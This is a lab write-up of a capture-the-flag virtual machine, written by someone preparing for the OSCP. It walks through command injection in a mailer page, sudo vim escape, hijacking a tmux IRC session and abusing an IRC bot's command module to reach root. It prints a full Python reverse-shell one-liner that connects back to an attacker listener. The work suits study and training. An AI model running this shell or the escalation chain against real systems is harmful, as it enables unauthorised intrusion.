Since I failed my first attempt at the OSCP, I’ve been on a holiday hiatus. Now that I’m back and prepping for round 2 of the OSCP exam, I thought I’d try a VM or two out to get my senses about me.
As usual, let’s start off with a quick scan of the network:
Looks like we’ve got SSH and HTTP definitely running on this machine, along with a result for a filtered IRC service. Navigating to the website asks for a username for the CTF. I enter z00n, and am taken to a new page:
Right off the bat, I copy those tips down in my notes and click on the “Start the CTF” link:
One of the first things to notice here is how this particular page is being called with “?page=home”. We may be able to leverage an LFI here. Let’s run wfuzz to find out. The first run through we are given a huge amount of output and a “Connection reset by peer” error:
Upon checking that we have access to the website still, we determine that the webserver is blocking our access now. Running another nmap scan shows that our http port has moved to “60080”:
Upon connecting to the new HTTP port, we are greeted with a new page with a funny quip about security through obscurity. Let’s try to run that wfuzz command again and narrow our results down:
Cool, it looks like we’ve got about a dozen hits. Running from top down, we get a bunch of “Nice try z00n buddy, this vector has been patched!” messages until we hit contact. Contact doesn’t have anything really useful on it, home is the new page we saw a moment ago, index is the starting page, and then theres mailer:
There’s a bit of comment code that’s interesting here. It looks like we can execute commands with the “&mail=” part. Let’s run a “whoami” to find out:
We’ve got code execution! Looks like the server is running as www-data. Let’s try to get shell with this new found ability. I’m going to encode our reverse python shell using a url encoder to make this:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.110.50",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Into something more acceptable for using in an address bar:
The final URL will look like this:
Ok, lets set up a listener on 443 and run it to see if we get shell:
We’ve got our first shell! Taking a quick look around the directory we’re dropped into doesn’t net anything very interesting, just the directory structure of the site and some extra pages we missed with wfuzz. Moving onto the home directory, we find a user for the irc service, a user named waldo, and a user named wallaby.
Under the waldo user, we find an interesting shell script for starting irssi (an IRC client run from the command line).
Under the wallaby user, there was a much more interesting directory, .sopel, that contained some configuration information for how an irc bot was configured. More interesting than that were the contents of the modules directory’s run.py file:
import sopel.module, subprocess, os
from sopel.module import example
def run(bot, trigger):
os.system('%s' % trigger.group(2))
runas1 = subprocess.Popen('%s' % trigger.group(2), stdout=subprocess.PIPE).communicate()
runas = str(runas1)
bot.say('Hold on, you aren\'t Waldo?')
It appears that there was a “run” command added to this bot that allows the user “waldo” to run system commands.
After some more digging and no answers, I decided to check sudo -l output to see if www-data had some sudo powers (Which I should have done much earlier):
We’ve got access to run iptables without a password and access to vim a specific file as the user waldo. I decided to go the vim route since breaking out of bash is easy enough, but first I needed to set my TERM variable:
Then run the appropriate sudo command:
And break out of vim:
Now that we’ve got access to waldo, let’s revisit that irssi script. It appears that (as a hint from the initial page suggested) this user may have tmux sessions running. Let’s check:
Cool, there’s a tmux session with irssi running. That script shows that it starts irssi up and connects as the waldo user, so let’s attach to the session:
We’ve been dropped directly into an irssi session, sweet. Let’s see if there are any other windows here besides what we can see using the “/WINDOW 2” command:
Awesome! We’re connected to IRC as waldo, let’s try that .run command out:
So we’ve determined that the bot is running as the wallaby user. Let’s try to get a shell from it using a basic bash reverse shell and setting up a listener:
Woo! We’ve got a shell for the wallaby user now! Let’s take a look at the sudo permissions for this account:
Full sudo access, switched to the root user, and grabbed the flag! Pretty entertaining VM, all in all.